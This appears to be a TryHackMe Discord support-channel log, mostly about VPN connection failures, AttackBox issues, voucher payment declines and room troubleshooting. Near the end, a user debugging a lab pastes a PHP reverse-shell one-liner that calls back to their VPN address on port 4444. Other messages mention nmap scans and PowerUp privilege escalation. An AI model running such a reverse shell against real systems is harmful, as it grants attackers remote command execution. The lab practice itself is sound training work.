#site-support

1 messages · Page 78 of 1

ivory spruce
marsh sigil
#

Hi @west chasm
Am i allowed to make video walktroughs and upload them on youtube? vent

ivory spruce
#

To my knowledge, you can do so. The only ask is to not give out the flags and for those challenge rooms that have been recently released, you have to wait for 72 hours to paas before releasing or publishing walkthroughs.

marsh sigil
#

@ivory spruce thank you blobfingerguns

scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 679)

ivory spruce
loud moon
#

Help! How do you pull up Windows Machines. THM sent me this Turtorial link, https://tryhackme.com/r/room/tutorial but when I do the same steps, I get a Unable to Connect error. I'm working thru the Auditing and Monitoring room and I'm on Task 7. Any help would be very much appreciated.

upbeat quarry
pearl gulch
#

have you started the victim machine

loud moon
loud moon
pearl gulch
#

yeah but you also have to start the victim machine. There'll be a little green box somewhere on one of the tasks.

#

that's how you get the right IP to connect to

#

for RDP

upbeat quarry
# loud moon I'm getting this when I click Remmina... Enter password to unlock you login keyr...

I do not think you will find a room or a section about remmina or RDP
I think you will get instructions about using these tools as you go through other rooms For instance, this room "Windows PrivEsc" will showcase another RDP tool called xfreerdp (see screenshot) as part of starting the room
So, my view is that you should accumulate these nuggets as you go along, complementing it with googling
You can also learn quite a few things by watching streamers on Twitch/YouTube doing THM rooms, in particular rooms that you have already done yourself, as that will give you another perspective (just my 2 cents)

autumn kettle
#

Hello, this 7 day streak required to access networks.. is it a one time unlock, or do i lose access if I lose the streak?

upbeat quarry
autumn kettle
#

ah yes, just searched through discord chats 3 mins ago and realized that.... then this shouldnt be an issue, thanks 🙂

loud moon
loud moon
scenic torrentBOT
#

Gave +1 Rep to @upbeat quarry (current: #60 - 128)

loud moon
#

THM Educators who are Admins on their account... Can you tell me how to apply a token to an existing account?

autumn kettle
#

I had some follow up questions on a previous question of mine that I had asked a couple days back. So I understand (as Scrubz said) that its possible for a network to be modified and might not be in the clean state when you work on it.

So...

  1. Are regular machines guaranteed to be cleaned? Like when a normal room is terminated, is it actually fully cleaned for the next user? I can't check it myself since a different IP etc is assigned so hard to say if the same "machine" is getting assigned to me
  2. So in a network, how do I know as a newbie if I am missing something and lack the knowledge or if the machine's vulnerability has been removed/vandalized.
  3. If... 5 users are not doing that network rn, and that network is kind of messed up, how can I get a reset?
keen scroll
#

You could ask a staff member to resolve it (3rd point) or probably leaving and rejoining can do it 🤔

#

...to assign you to a different subnet of that network room

zenith falcon
upbeat quarry
prisma trench
#

Hello. I forgot to close my AB and I hit the limit of 3 x). Is there a way to see where they are? or do I have to wait the remaining time?

upbeat quarry
woven mural
#

@west chasm
I have a question regarding the opnevpn setup. I get “[ENETUNREACH]: Network is unreachable (fd=3,code=101)” only when uploading images, reverse shells, etc. and cannot upload them. Could you please tell me how to solve this problem? I have already tried thm-troubleshoot.

ivory spruce
#

As the error gives out network is unreachable, it may be a problem on your ISP or the connection you are using.

zenith falcon
woven mural
upbeat quarry
upbeat quarry
woven mural
upbeat quarry
woven mural
upbeat quarry
west chasmBOT
woven mural
#

Thank you。
Only when uploading a file, I get an error like the one on the right.

upbeat quarry
woven mural
scenic torrentBOT
#

Gave +1 Rep to @upbeat quarry (current: #57 - 136)

upbeat quarry
scenic torrentBOT
#

Gave +1 Rep to @woven mural (current: #2218 - 1)

chrome rain
#

got a connection error

#

should i terminate the vm and restart it?

chrome rain
#

i fixed it i mounted something wrong and the vm crashed but didnt die

hard frigate
#

Hello, I cannot download Holo VPN access, anything I can try to get it in another way ? Server returns 504 to the download request

civic sedge
#

how can i change my country?

#

its turkey and i want it to be iraq

dreamy fractal
#

Hello people, impossible for me to download the CICD vpn configuration file from my access page in the room CI/CD and Build Security (I have a premium account), it's hanging in "Downloading Configuration file" forever. Similarly even when I am supposed to be on the correct network when I spawn my attackbox, I can't ping or telnet the gitlab's server ip address. Anyone has (had) the same issue?

upbeat quarry
dreamy fractal
scenic torrentBOT
#

Gave +1 Rep to @upbeat quarry (current: #56 - 138)

dreamy fractal
#

Just saw your subs-room-help's comments, should have checked there first 😅

upbeat quarry
upbeat quarry
tacit hazel
#

guys

#

i cannot conect to thm vpn

tacit hazel
#

seems that nothing connects

ivory spruce
glad lark
#

Hi. I cannot download VPN pack for wreath room. could someone help me with this.

prime finch
glad lark
#

i saw this tip. but this wasnt working for me. i have rejoined mutliple times with some time gaps. still same.

untold agate
#

why is the attack box so slow

#

an nmap scan is taking an hour

thorn fox
#

hiya , need help with openVPN on macos

gray crow
#

Quick question:
When connected to THM network via OPENVPN, are you supposed to have internet access while being connected?
I ca ping 8.8.8.8 adn google stuff, but i can also attack the machines.
Im afraid I did somethign wrong and accidentally set up some kind of split tunneling?
Which I would prefer not, incase i type an IP wrong and accidently attack someone on the WWW.

tepid trench
#

Hiya - Having trouble buying vouchers, it's refused multiple cards over the past 2 days at this point - Any ideas what may be going wrong?

vague nacelle
#

Hello
Im teacher for cyber school & i cannot buy voucher for my students. Paiement fails, but when i buy subscription for myself it works.

#

Anyone facing the same issue ?

tepid trench
candid locust
#

I just bought tryhackme voucher and money has been deducted from my account but it says Card not accepted

hard frigate
ivory spruce
ivory spruce
ivory spruce
ivory spruce
thorn fox
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 682)

tepid trench
#

@ivory spruce Is there a B2B support contact I should message?

ivory spruce
west chasmBOT
#

@tepid trench

TryHackMe's Email

TryHackMe's support email address.

tepid trench
#

Ah, ok, it's just that it's already the second day of this issue with no reply from that email (aside from the automated one) - I'll add that it's a business issue and see if that helps.

ivory spruce
#

If I remember correctly, the standard response time is ~1 to 3 business days these days, but I have no idea on the SLA for business or education plan or account.

tepid trench
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 683)

untold agate
#

I know that scanning all the ports would take a while but the task requires me to do so

ivory spruce
wind wedge
upbeat quarry
candid locust
untold agate
upbeat quarry
# hard frigate Yes, exact same thing. Did you manage to get it ?

I also tried to regenerate: failed too, with different pattern:

  • the "regenerate" button spins for like 30 seconds
  • then the download button spins for another 30 seconds, and ends without that red error message
    See additional 2 screenshots
    Leaving and joining back has been tried multiple times, with no help
dense tusk
#

hello, while copying an answer, I forgot half of my solution. As a result, I validated anyway.

upbeat quarry
glad lark
#

same problem

upbeat quarry
# glad lark same problem

I have checked on Holo network: same problem with same symptoms (@hard frigate reported that too yesterday)

fallen garden
#

need help with slingshot room in SOC 2 path.
after entering creds the page keeps showing :
Elastic did not load properly. Check the server output for more information.
I tried with different ip but nothing, i redownloaded another vpn config file but didn't work.
connection is established by checking 10.10.10.10.
Can someone check first ?

upbeat quarry
# untold agate 6

scanning all ports on that box indeed takes some time
did you find port(s) open?

untold agate
upbeat quarry
upbeat quarry
# untold agate nmap -sS [ip] -p- -vv

I am just redoing that task now, and indeed it takes way too long with a command equivalent to yours: see screenshot
I have stopped that scan after 20 minutes at 22% completion with another 46 minutes to go
By that time, no port had been reported open
Then I restarted the same nmap command as non-root user, and the result came back nearly instantaneously I can share a screenshot for that second scan too if you want Spoiler alert: it contains answers to some questions of Task 6
BTW, next time, it is best to address room-specific questions in #room-help

chrome rain
#

guys i got this multiple times and when i tought it was fixed i got it again "Unfortunately, your instance has been automatically terminated. Please re-start a new one. To learn more about why this happens, please refer to "

vague nacelle
#

I did not get refunded.

upbeat quarry
fallen garden
#

Yeah exacty did login in with creds worked it was loading infinitely without result

ivory spruce
west chasmBOT
#

@vague nacelle

TryHackMe's Email

TryHackMe's support email address.

civic sedge
#

yo

#

how i can change the country?

gleaming flume
gleaming flume
#

?

civic sedge
#

but thx

gleaming flume
#

If you want a country you are not currently in you could always run a VPN from said country and then hit the link

civic sedge
#
  • its my problem but how on earth ill find a vpn have iraq server
gleaming flume
civic sedge
#

well bcz ill not find a vpn with iraq , can i make a friend log in and change the time zone by himself?

gleaming flume
#

Probably?

lusty crane
#

im trying to solve the task manual discovery in content discovery

#

it says put your machine ip with sitemap.xml

#

when i do it gives me error 405

ivory spruce
tacit hazel
ivory spruce
tacit hazel
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 684)

untold agate
gleaming flume
#

Just a normal user, "root" for linux is like the "administrator" of windows, so a non-root user is just anyone else without root perms

cerulean oracle
#

Would def be nice to have a friend system to see what your friends are working on, their streaks, etc

shrewd wasp
#

bro help me plz, i download openvpn file and run in kali linux but not connect

#

restart and download file again but not connect

gleaming flume
#

What exactly do you mean by not connect? What is your openvpn output?

shrewd wasp
gleaming flume
#

That page is broken, but your VPN should still be working

shrewd wasp
#

i use sudo openvpn but not conected bro T-T

gleaming flume
uncut cipher
#

Hello, I am facing issue with subscribing to the premium pack. Please help
I was a regular subscriber for about 3 months but discontinued this month to buy the annual plan. Now, whenever I try to make the payment the tryhackme payment portal shows bank declined the transaction but the amount is deducted from my account.
From India

ivory spruce
west chasmBOT
#

@uncut cipher

TryHackMe's Email

TryHackMe's support email address.

uncut cipher
ivory spruce
uncut cipher
shut coyote
#

Hey guys ! I got a problem i can't use the attack machine anymore (i don't find the start button) am i the only one with this problem ?

upbeat quarry
shut coyote
#

Thank you guys !

upbeat quarry
radiant siren
#

Any reason it just freezes everytime after ../PowerUp.ps1?

naive dust
ivory spruce
wind wedge
uncut cipher
scenic torrentBOT
#

Gave +1 Rep to @wind wedge (current: #51 - 153)

ivory spruce
# uncut cipher yes, want me to share it?

No need, @wind wedge here provided an update that their team will get to your ticket. Please wait until sometime next week as they don't work on weekends. You don't have to worry about the lost time since your payment as they will only start your subscription once they have looked at or sorted it.

ivory spruce
novel comet
#

Hello TryHackMe Team, it’s been a long time i didn’t login into the site, and i think you recently change how username nickname fullname works. When i log back on, i’ve seen that a new random username was set, but when i want to change it back to the older one, the site tell me that it’s not available (which is hold be me ..) so I’m stuck with a different username 🥲

uncut cipher
novel comet
#

My lvls are gone :’(

ivory spruce
normal badge
#

quick question here on a room:

https://tryhackme.com/r/room/cicdandbuildsecurity

I am trying to do this room , but I am stuck because the IP addresses of the Gitlab and Jenkins network do not seem to be correct. I am using the attack box and I started up the network, but when I ping the IP addresses listed, I get no response. Does anyone here know the fix?

ivory spruce
west chasmBOT
ivory spruce
novel comet
#

That’s probably an alt account, i check and i go back .. I’m so dumb

ivory spruce
#

Signing in with your Google account will create a new account for you in THM (unless that is how you used to login since).

novel comet
#

I’ve created it with google account but since I’ve setup a student account so a bit messy in my mind :/

uncut cipher
# ivory spruce No need to share. You'll need to verify your account to be able to share a scree...

These are the screenshots for the recent transactions (TODAY, 13/09/2024 5:20pm). First is error I got on the tryhackme portal. second is the amount was deducted and subscription wasn't activated.

Sorry to point this out but my previous ticket was generated on MONDAY, which is the start of the week and still no response, that is quite disappointing from the support team, at least a follow would have assured me that some action is being taken.

ivory spruce
silk rampart
#

Ok guys I have a somewhat silly question. I’m working on a project where I have scan a folder with clamav to find a malicious file. Problem the account is not in the sudoers file and I do not have the root password and it’s on a vm so I can reboot to reset pw!!!! 🤬🤬🤬 what am I missing?

normal badge
#

can anyone answer the question I posted above about that specific room I am having issues in?

novel comet
uncut cipher
# ivory spruce For your previous ticket, you mentioned it was refunded to you? Is there anythin...

The issue in the previous screenshots are serious since that is the 4th time I'm getting it and can't even report to the team.

Yeah I had to contact my bank the next day to get the money back, but these errors are prevalent. I wanted to create a new ticket but couldn't, I suppose until the team clears the previous ticket we can't create a new one.
Nothing remains on the previous ticket but let us create new ones, that's what I was trying to get to, if the previous tickets are not clear how can we create a new one?

check these screenshots.

viral surge
#

Hello, I’m facing a problem with payment…
THM took 42US while i have not pay for anything and my next payment will be on October 1st

upbeat quarry
shadow ferry
#

I am from India.... Actually I am facing some issues regarding TRYHACKME vouchers....

My debit card got declined many times....

How can I buy try hack me premium???

upbeat quarry
# normal badge quick question here on a room: https://tryhackme.com/r/room/cicdandbuildsecurit...

I have the same problem: Gitlab and Jenkins do not respond to ping, and my understanding is that they should
that room has another problem: when you try to regenerate a VPN configuration, you end up downloading the same one all the time
you can go back to my conversation on this with @gray delta at:
#subs-room-help message
If is also worth visiting this channel dedicated to that network: #ci-cd-and-build-security
it would be good if you could report this under #room-bugs

upbeat quarry
normal badge
#

thanks I submitted it to that channel

upbeat quarry
# normal badge thanks I submitted it to that channel

thanks, just seen it
I'll contribute to that message with more inputs, to keep it alive, but that may have to wait till the WE
so far, I have not seen how THM formally acknowledges potential bugs, like "already known" or "never seen before"

ivory spruce
ivory spruce
uncut cipher
ivory spruce
# uncut cipher <@454283231542509579>

I understand where you are coming from. However, please note I'm not a member of THM Staff so there isn't much I can do but assist with initial troubleshooting and the next steps you can take.

radiant siren
#

"To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:"

#

But yes somone mentioned that I should try ./PowerUp,ps1 instead and that worked, although In the image they use ../, same in writeups

novel comet
upbeat quarry
uncut cipher
radiant siren
pure needle
#

Hey, so I have a question. Are all the modules covered throughout all the paths? Like if I were to do all the paths, would I cover all the modules? Or are there some modules that are stand alone and are not a part of any paths? Thanks in advance

ivory spruce
pure needle
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 688)

ivory spruce
pure needle
#

I suppose this could be a nice python program to code up... hmm interesting.... most interesting....

#

I'll brb xD

keen scroll
#

Be aware of the public API usage.
Also, it seems to be continuously updated for new features

naive dust
ashen oasis
#

heyho guys, i am doing the breaching AD room. It sais it is active but i cant ping the DC with its ip.

upbeat quarry
ashen oasis
#

plus the network state is running

upbeat quarry
wide turret
#

hey guys, I am connected to tryhackme's openVPN file from my side but on website it is still showing not connected. I have tried regenerating new ovpn file and connecting still facing the same issue. what to do?

ashen oasis
upbeat quarry
ashen oasis
#

the last thing i would have done would be to wait for the machine to run out of time xD

weary spindle
#

Could always give me the subnet and I can check the network,

I have that power 😄 mwahahaha.

upbeat quarry
zinc carbon
#

Hello, what’s happening with the vouchers? It keeps saying that my card is declined, and the only issue I have with my card and payments is on your website, and only when I try to purchase vouchers. My monthly subscription went through without any problems.

weary spindle
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

muted quiver
#

I want to know If it is true,👆

keen scroll
#

@stray cove can you check this out please?

stray cove
muted quiver
#

The site is called try to hack me Vouchers on telegram

muted quiver
muted quiver
#

What's the difference in buy VOUCHERS and buy annually premium?

gleaming flume
#

Vouchers don't automatically renew and could be gifted afaik - though if you are just buying for yourself annual sub makes more sense

frail adder
#

It's not working!

wary spruce
#

Hello, I am trying to log in

#

problem is, it is saying password is wrong. I tried resetting, but i am not geting any email

#

I know password is correct as it is saved on edge and i used to directly log in using that

#

email is also correct as i can see the spam from tryhackme

timid talon
frail adder
#

I did! Just for show. The problems are that when I copy paste the lines with active machine ip, I got flag error and then I changed ',W1' instead of ':W2', it worked yet no outcomes.

timid talon
frail adder
#

own VM Sir

timid talon
frail adder
#

Yes I carefully change the name of the wordlist path. If it worked for you, I should consider to do it on attackbox again.

timid talon
frail adder
#

Thanks man let me try it on attackbox

queen sable
#

@weary spindle how do i see the ip that i need to open to follow a specific room

queen sable
#

this room for example

west chasmBOT
queen sable
#

but it does give me the option to open it using attackbox

#

then i should be able to use openvpn as well

#

right?

gleaming flume
#

Did you read the article he sent or the first task instructions? Yes you can use openvpn for that room

queen sable
#

like what IP do i write in my VM's browser to do the room's stuff now that i have it setup

queen sable
# gleaming flume

i think i'm not able to articulate my issue properly
this is all fine
i've started the task machine and everything

#

but i want to do the room's stuff in my VM

#

and i've set up thm's openvpn on the VM as well

gleaming flume
#

If you start the task machine it will give you the IP to access it from your own VM

gleaming flume
#

Depends on the room, for that one via the command line with nmap

queen sable
#

with ssh?

gleaming flume
#

Not for that room, no

queen sable
gleaming flume
#

If you don't understand how to interact with the room even after reading the task information then perhaps you should take a step back and go through some of the introduction learning paths like introduction to cyber security

queen sable
gleaming flume
#

Hmm well I'm on my phone so I can't check but isn't that a walkthrough room? Shouldn't the task tell you what to do?

queen sable
#

i have done the previous rooms with the attackbox

#

i'm just not sure how to interact in the same way using openvpn

gleaming flume
#

It's the same thing, just use the terminal or whatever like you did on the attackbox

queen sable
#

i was thinking i had to do something really complicated to be accessing the machines all this time pepehands

gleaming flume
#

Nope, just the VPN and you are good to go

queen sable
#

another thing was this saying that i need to deploy this machine if i am using attackbox

#

i took that as if i am using openvpn, i can't just deploy the machine and instead have to do some kind of complicated setup

gleaming flume
#

Ah no, so there will generally be two machines the victim machine (green button) and the attackbox (blue button), you will always need to launch the victim machine but if you are using your own VM you just ignore the attackbox

queen sable
#

can i write everything i would write in the attackbox, without any changes, like changing the victim machine ip into my VM?

#

every command is exactly the same for my own VM?

gleaming flume
#

Pretty much, though for something like a rev shell you would need to know your IP for your VM instead of the attsckbox's IP - concepts are all the same though

queen sable
#

alright, thanks for helping out with it
i know these were really dumb questions, but i'm really new to learning cybersecurity, so these concepts were a little confusing to me

gleaming flume
#

No worries

south sundial
#

hi, why show incorrect answer on question?

You are asked to test an application but are not given access to its source code - what testing process is this? - Black-box Testing
You are asked to test a website, and you are given access to the source code - what testing process is this? - White-box Testing

what is wrong in answer on room???

gleaming flume
lime estuary
#

do you know what's happening?

gleaming flume
#

Which vpn server is this?

lime estuary
#

wdym?

#

from thm

#

oh okay

#

now its okay

#

idk what happened

gleaming flume
#

hmm strange

#

Its working now though?

lime estuary
#

yes

gleaming flume
#

Well that's good

lime estuary
#

yeap

arctic mountain
#

hi, I haven't been able to download the ovpn config file since yesterday. after clicking "Download configuration file", it loads for a while before showing the error message "An unknown error has occurred". is there any way I can resolve this? thanks!

gleaming flume
steady gulch
#

Hi all, I trying to connect with THM using Openvpn, but i am getting the following errors. I regeneated the ovpn files and tried it

worn socket
#

I think the VPN connection status indicator on the site is broken. My VPN service says I'm connected and I can see that I have an IP but the connection status on the site says I'm disconnected.

ivory spruce
ivory spruce
weary spindle
#

There is a friend list.

ivory spruce
weary spindle
ivory spruce
scenic torrentBOT
#

Gave 1 Rep to .scrubz. (current: #1 - 2754)

cerulean oracle
#

Ah ty

cyan swan
#

I am doing file inclusion room , the lab playground (&&I am unable to solve that can anyone help)

onyx solstice
#

Hi, I can't download the hololive ovpn. The other ones work (both Networks and Machines). I always get "An unknown error has occurred". Same with the button "Regenerate" when hololive is selected.

scenic torrentBOT
#

Gave +1 Rep to @upbeat quarry (current: #50 - 155)

plucky idol
#

Hey, i am having problems connecting to vpn. i can load 10.10.10.10 and see the flag, but its doesnt show as connected on THM website. Help pls

plucky idol
scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #1 - 2758)

stone mountain
#

Hi I need help with voucher, I bought a voucher yesterday and already tried to email the support (the instruction in the pinned comment) and still no response. I have not yet receive my voucher code yet. If anyone has any idea what to do that would be great. Thanks!

cerulean oracle
#

Is it agaisnt thm tos to post screenshots of what we are doing on our GitHub portfolios?

stable rune
#

try changing vpn config file if you have eu1 try eu2

lime estuary
#

I fixed it

pine mica
#

hello

lime estuary
#

Hello

narrow hinge
#

??

tardy vessel
#

Hello, website seems to be down...is it the case for me or everyone else?

cyan swan
#

i guess I am also \

#

facing the same

solar hinge
#

Does anyone know what the issue could be, Im currently doing the metasploit series but cant get the reverse shells to work when using my vm but using the attacker box it works fine

ivory spruce
solar hinge
#

yes strangely I used to be able to use any vpn configuration file now only US and IN is connecting - when I go to 10.10.10.10 it says im connected

finite dune
#

Anyone experiencing issues with redteamcapstonechallenge VPN server configuration file?

Anytime I am trying to download a config file, I will get "An Unknown error has occurred".

The room says that AttackBox should be able to connect to Capstone challenge, but no luck there either.

narrow rapids
#

just out of curiosity, how the points are calculated per questions? i know challenges have more points, but why do i solve all the questions yet someone solves the same and gets more points?

west chasmBOT
upbeat quarry
finite dune
# upbeat quarry I can download the VPN configuration, but I cannot regenerate it: the regenerate...

This is what worked for me eventually:
So, when I tried to Download OpenVPN configuration file for Capstone network, I would get "Unknown error message".
I also tried THM Attack Box, which should have access to Capstone network, but no luck there either.

Troubleshooting:
Reset progress of the room
Leave room
Join the room again (DO NOT press START button)
Go to THM Access section and Capstone VPN configuration file should download just fine now
Start the Capstone Network
Happy hacking

upbeat quarry
scenic torrentBOT
#

Gave +1 Rep to @finite dune (current: #2220 - 1)

upbeat quarry
finite dune
upbeat quarry
finite dune
lucid basalt
#

Hello there, I am trying to use Wazuh server but it kept showing "The connection has timed out" I waited more than 5 minutes before accessing the link..

astral delta
#

NEED HELP
my tryhackme is not connecting with open vpn i downloaded configuration file also regenerated 3 times but it is not connecting few days ago everything was okay now don't know what happned

weary spindle
#

Is the markdown really needed?

weary spindle
#

Which os and where do you live?

astral delta
astral delta
weary spindle
astral delta
weary spindle
astral delta
weary spindle
west chasmBOT
astral delta
astral delta
weary spindle
#

Is this eu3?

astral delta
#

same for eu 3

weary spindle
astral delta
#

i tried now

astral delta
#

server status online connection not connected

weary spindle
astral delta
astral delta
weary spindle
astral delta
#

okay

astral delta
fallen garden
#

@upbeat quarry still having the slingshot room problem i have tried to contact support but nothing

upbeat quarry
fallen garden
#

nope

upbeat quarry
fallen garden
#

vpn

#

it might work with attackbox idk didn't try

upbeat quarry
# fallen garden vpn

I have just went back on Discord to our previous conversation, and when I tried I used the AttackBox
if you have the option of the Attackbox, you are removing the VPN from the list of potential issues

fallen garden
#

i do let me try first

cyan swan
#

Can anyone give me a free try hack me premium subscription.

#

it will be a big help

#

i finished mine today

fallen garden
#

@upbeat quarry bruuuuh it works LOL

#

and it's faster

#

but i don't see the issue using vpn

fallen garden
upbeat quarry
# fallen garden but i don't see the issue using vpn

ok. let's look at the VPN issue
first of all, the AttackBox through your browser is on the same THM network as the target machines
with the VPN, you have to go over the internet for each interaction with the target machine
do you always have issues with the VPN, or only with Slingshot?

fallen garden
#

only machines that have elastic

#

i've continued the path and found out the same problem in : Threat Intelligence for SOC

#

when i deployed the machine

upbeat quarry
# fallen garden only machines that have elastic

it would be interesting if you have the chance to try "simpler" machines, like the ones of "Network Services" or "Network Services 2", which are not as heavy as elastic machines
in that context, I am sending you a link for troubleshooting VPN just below

west chasmBOT
fallen garden
#

ok thanks i'll try this

naive dust
#

Hello
Is the ERROR normal ? But at the same time Gobuster found what I was looking for so I don't know..
I am working on OpenVPN, Kali - Upload Vulnerabilities Room
' context deadline exceeded (Client.Timeout exceeded while awaiting headers) '

fallen garden
#

@naive dust reduce threads

#

do like 3 or 4 using -t thread_value

naive dust
scenic torrentBOT
#

Gave +1 Rep to @fallen garden (current: #2220 - 1)

sonic oriole
#

I need help recovering my iCloud account I can’t remember my password

oblique nexus
#

Hi, how long is the process for my write-up to be accepted in a room ? Because the submission mail redirects me to /room/manage but it's empty over there 🤷🏻‍♂️

empty hull
#

can someone help me?

#

im stuck at the windows room

#

investigating windows

pearl gulch
#

just ask what you want

empty hull
#

what?

weary spindle
#

State your issue,

empty hull
#

i cant find this one:At what date did the compromise take place?

pearl gulch
#

look for the earliest date of the supicious events.

mystic depot
#

Hey, I cant login into my account because I lost access to the Authenticator app on my old phone (which I reset without transfering it on my new phone). I have the recovery codes but that seems the only option to me to login into my THM account. What can I do?

desert flax
#

Hey all,

I think I've found an unintended privilege escalation vector in one of the rooms.

Who can I talk to about this?
Is this normal, should I just go about my day? 🙂

Why I think this:

  • The room explicitly asks for a CVE ID for the PE exploit, and expects the CVE ID of the official solution (not the one I used).
  • All writeups I read (6 or 7) talk only about the offical solution. None mention the exploit I found.
oblique knoll
#

Having trouble pasting anything while in AttackBox. I can see content in clipboard, but nothing will paste, example can’t paste into terminal or BurpSuite. Have reset settings and made sure THM is allowed for clipboard. Not sure what to do. I don’t have this issue anywhere else but in the AttackBox. I’m using a Mac.

storm jungle
#

Hlw, I can't connect to the internet via TryHackMe virtual machine. I tried for almost 3 hours. It's not working. Please help me guys

zealous yoke
zealous yoke
zealous yoke
zealous yoke
# storm jungle Hlw, I can't connect to the internet via TryHackMe virtual machine. I tried for ...

The VMs in rooms (or the AttackBox if you're not a subscriber) do not have internet access. This is intentional because generally speaking, exposing vulnerable machines to the internet is a bad idea 🙂

If you're trying to copy files over, you'll need to do this over the VPN network from your machine, or the AttackBox itself if you're using that (for example NC, hosting a python server, etc)

zealous yoke
zealous yoke
#

hello 🙂

storm jungle
#

i have premium subscription. I can access internet via attack box, but not in TryHackMe virtual machine

zealous yoke
#

I understand - thanks for clarifying. Okay yup, so that's intentional

#

With a subscription, your AttackBox can access the internet, but the machines you deploy in a room (i.e. via the "Start Machine" button in the tasks) do not - even if you have a subscription

#

This is because they are generally and intentionaly vulnerable, and again, exposing them to the internet is quite a bad idea 😅

#

For example, a vulnerable web application or service on a port 🙂

storm jungle
#

if I can't access then how can I reply the questions ?

zealous yoke
#

You pretty much shouldn't need to access the internet via that machine to answer questions. Granted, you might need to access the internet on your device itself sometimes.

What room, task and question are you doing?

storm jungle
zealous yoke
#

Ahhhh

#

Okay I think I see the problem. So it's a little bit ambiguous, but you need to use your device to look up the file on Talos Intelligence using your device and not the machine itself, if I remember correclty

storm jungle
#

I need Email2.elm file to scan

zealous yoke
#

if you look at the task above (Task 6), it'll show you how to use that website to lookup the artefacts. But again, this needs to be done via your personal device (or your AttackBox) and not the machine deployed in Task 5, because it doesn't have access to the internet 🙂

#

Mhhm I thought it was updated to include a way of downloading it to your machine but apparently not.

So you'll need to use something like netcat, or host a python webserver, or similar to download the file from that machine to either your AB or your device/VM connected to the THM VPN

plucky acorn
#

I'm on Malware Introductory and I'm having trouble with task 6. I clicked on the start machine button and my screen split in two, with the tasks on the left and a desktop on the right. On the right I opened Remote Desktop Connection and inputted the computer and username info, but when I click on connect, it tells me that "The connection was denied because the user account is not authorized for remote login". Could someone help me out please?

scenic torrentBOT
#

Gave +1 Rep to @zealous yoke (current: #8 - 866)

uncut cipher
#

Is the support team up and solving tickets? Need to subscribe to premium, stuck for a week now!

upbeat quarry
hot horizon
#

The solution about openvpn connection error have been found. The error shows:2024-09-05 00:32:35 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set. 2024-09-05 00:32:35 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers. 2024-09-05 00:32:35 Note: '--allow-compression' is not set to 'no', disabling data channel offload. 2024-09-05 00:32:35 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO] 2024-09-05 00:32:35 library versions: OpenSSL 3.0.14 4 Jun 2024, LZO 2.10 2024-09-05 00:32:35 DCO version: N/A 2024-09-05 00:32:35 TCP/UDP: Preserving recently used remote address: [AF_INET]3.7.33.194:1194 2024-09-05 00:32:35 Socket Buffers: R=[212992->212992] S=[212992->212992] 2024-09-05 00:32:35 UDPv4 link local: (not bound) 2024-09-05 00:32:35 UDPv4 link remote: [AF_INET]3.7.33.194:1194 2024-09-05 00:32:35 TLS: Initial packet from [AF_INET]3.7.33.194:1194, sid=1efb21a9 9f34d986 2024-09-05 00:33:35 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 2024-09-05 00:33:35 TLS Error: TLS handshake failed. The reason is because of chinese gfw and the solution is adding socks-proxy in ovpn file, like this:

#

Hope someone who have the same error will find this solution by retrieving the chatting record

upbeat quarry
scenic torrentBOT
#

Gave +1 Rep to @hot horizon (current: #2220 - 1)

scenic torrentBOT
#

Gave +1 Rep to @zealous yoke (current: #8 - 867)

bronze vale
hidden crypt
#

Yesterday I had a 78 streak and I made a ctf yesterday. 1 it didnt go towards my streak, 2 I was only able to use a streak freeze 1 time. I should have had 2. Is there support for this?

clear needle
#

I dont know if im in the right channel. but i try to get a reverse shell over the vpn but my linux machine cant listen to the openvpn ip.

netcat: Cannot assign requested address```
weary spindle
clear needle
#

yeah if i use none or 0.0.0.0 the reverse shell does not work.

#

it works on attackbox

weary spindle
#

Try using -nlvp

clear needle
#

nope.

#

I dont get a responce. I use the same reverse shell i connected to attackbot

#

php -r '$sock=fsockopen("10.21.44.123",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

#

using debian linux

#

my hour of attackbox is over cant verify the command

#

ping results in a positive result.

weary spindle
#

Then something could be blocking on your VM.

clear needle
#
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination```
#

openvpn setting perhaps?

#

oh wait.

#

using the right vm works. using the -nlvp works.

graceful birch
#

Hey everyone, I am having an issue downloading the vpn file for the CICD security network room. I tried the recommended procedure of leaving the room for 30 minutes, even resetting progress, then joining and regenerating a vpn file and then downloading but I always get "An unknown error has occurred". This is the 4th time I've tried it. Is anyone having the same issues?

#

Also, when I run the attack box, it is not connected to the CICD interface or network

#

when I run ifconfig, it is not connected it seems

low edge
#

Hey
I’m having trouble getting VPN packets for networks. This has been going on for days at this point. Is this being fixed?

rare dove
#

Hello, I am having issues with Task machines on Windows. When I start the machine, after loading it says:

The TryHackMe remote server is not currently reachable. 
Please check your network and try again.

However, when I try that on Linux, it's working normally. Is this Windows-related issue ?
(AttackBox is working on Windows)

atomic crow
#

hello i was trying to connect to solve a lab but on my access page it shows im not connected but i'm already connected i can see my tun0 ip and can visit 10.10.10.10 . what can i do because i already redownloaded the config file and changed server then also it shows the same

toxic mountain
#

hello, I am unable to download the openvpn script for wreath network from the access page. I have subscribed but I haven't been able to download the file even after regenerating and reloading the page.

gleaming flume
gleaming flume
remote rain
#

are there any advantages of connecting via the vpn rather than attackbox?

weary spindle
#

Attackbox will always revert to the state it was booted in

remote rain
#

I see

#

Is there any way to revert it if you mess up a lab somehow? apologies if it's a silly question, I am still a noob

#

dont think I've had that issue yet though

empty hull
#

